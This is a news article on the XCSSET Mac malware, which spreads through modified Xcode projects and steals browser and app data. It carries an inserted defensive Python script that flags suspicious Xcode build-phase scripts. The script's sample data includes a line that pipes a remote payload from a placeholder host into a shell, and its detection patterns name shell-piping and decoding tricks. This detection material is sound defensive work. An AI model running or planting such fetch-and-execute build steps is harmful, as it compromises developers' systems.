New XCSSET Mac spyware exploits Two zero-day vulnerabilities in Mac to steal sensitive data

Experts have detected XCSSET, a new Mac malware strain that spreads through Xcode projects and exploits two zero-day vulnerabilities to steal sensitive information from target systems and launch ransomware attacks.

An Xcode project is a repository for all the files, resources, and information required to build one or more software products. A project contains all the elements used to build your products and maintains the relationships between those elements. It contains one or more targets, which specify how to build products. A project defines default build settings for all the targets in the project (each target can also specify its own build settings, which override the project build settings).

Of the two vulnerabilities, the first is used to steal cookies via a flaw in the behavior of Data Vaults, while the second is used to abuse the development version of Apple-made Safari. According to the experts, the flaw also allows stealing data from several popular applications, including Evernote, Skype, Notes, QQ, WeChat, and Telegram.

The malware not only lets attackers steal data but also allows them to capture screenshots and exfiltrate stolen documents to the attackers’ server.

“This threat primarily spreads via Xcode projects and maliciously modified applications created from the malware. It is not yet clear how the threat initially enters these systems. Presumably, these systems would be primarily used by developers. These Xcode projects have been modified such that upon building, these projects would run malicious code.” reported Trend Micro. “This eventually leads to the main XCSSET malware being dropped and run on the affected system. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.”
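One defensive check that follows from the build-time behaviour described above, added here as an example and not code from the article or from Trend Micro: a small Python audit that lists every run-script build phase in an Xcode `project.pbxproj` file and flags patterns a reviewer would want to look at before building a project from an untrusted source. The `project.pbxproj` fragment, the indicator list and the `example.invalid` URL are constructed for the example.

```python
import re

# Constructed fragment of an Xcode project.pbxproj file (sample data, not from
# any real project). The second phase fetches and runs remote content at build
# time, the kind of hidden build-step behaviour worth surfacing in review.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA0001 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Run Script";
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "echo \"building\"\n";
		};
		AA0002 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Run Script";
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "curl -s http://example.invalid/payload.sh | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# One pbxproj object block: "<hex id> /* comment */ = { ... };". Shell-script
# phases contain no nested braces, so a non-greedy body up to the first "};"
# is enough (buildSettings blocks elsewhere in the file would need more care).
_BLOCK_RE = re.compile(
    r'([0-9A-Fa-f]+)\s*/\*\s*(.*?)\s*\*/\s*=\s*\{(.*?)\n\s*\};', re.DOTALL)
_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.DOTALL)
_NAME_RE = re.compile(r'\bname\s*=\s*"?([^";]*)"?\s*;')

# Heuristic indicators (label, pattern). These are review prompts, not proof
# of malice: legitimate scripts also use curl, so every hit needs a human look.
INDICATORS = [
    ("remote fetch", re.compile(r'\b(curl|wget)\b')),
    ("pipe to shell", re.compile(r'\|\s*(sh|bash|zsh)\b')),
    ("decoded payload", re.compile(r'\bbase64\b.*(-d\b|--decode)')),
    ("inline interpreter", re.compile(r'\b(osascript|python3?|perl|ruby)\b\s+-e')),
    ("eval", re.compile(r'\beval\b')),
]


def _unescape(s: str) -> str:
    """Undo pbxproj string escaping (backslash-quote, backslash-n, backslash-t, double backslash)."""
    return re.sub(r'\\(.)',
                  lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), s)


def extract_script_phases(pbxproj_text: str) -> list:
    """Return every PBXShellScriptBuildPhase as a dict with id, name and script."""
    phases = []
    for m in _BLOCK_RE.finditer(pbxproj_text):
        obj_id, body = m.group(1), m.group(3)
        if 'isa = PBXShellScriptBuildPhase;' not in body:
            continue
        script_m = _SCRIPT_RE.search(body)
        if not script_m:
            continue
        name_m = _NAME_RE.search(body)
        phases.append({
            'id': obj_id,
            'name': name_m.group(1) if name_m else '',
            'script': _unescape(script_m.group(1)),
        })
    return phases


def flag_suspicious(script: str) -> list:
    """Labels of every indicator that matches the script text, in INDICATORS order."""
    return [label for label, rx in INDICATORS if rx.search(script)]


def audit(pbxproj_text: str) -> list:
    """Script phases with their indicator labels attached."""
    return [dict(p, indicators=flag_suspicious(p['script']))
            for p in extract_script_phases(pbxproj_text)]


if __name__ == '__main__':
    for p in audit(SAMPLE_PBXPROJ):
        status = 'REVIEW' if p['indicators'] else 'ok'
        print(f"{p['id']} {p['name']!r}: {status} {p['indicators']}")
        print('    ' + p['script'].strip().replace('\n', '\n    '))
```

Run it against a real `project.pbxproj` by reading the file into `audit()`; anything flagged is a starting point for a manual read of the script, not a verdict, since plenty of legitimate projects download tooling in a build phase.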

In addition, the malware can inject malicious JavaScript code into the browser when specific websites are visited, changing the user’s browsing experience. This is done through universal cross-site scripting (UXSS) attacks and allows the malicious code to replace cryptocurrency addresses and steal credentials for online services (amoCRM, Apple ID, Google, PayPal, SIPMarket, and Yandex) as well as payment card information from the Apple Store.

However, it is not yet clear who is operating this malware or how many users have been affected. For more news on tech and cybersecurity, stay tuned to Android Rookies by subscribing to our newsletter.
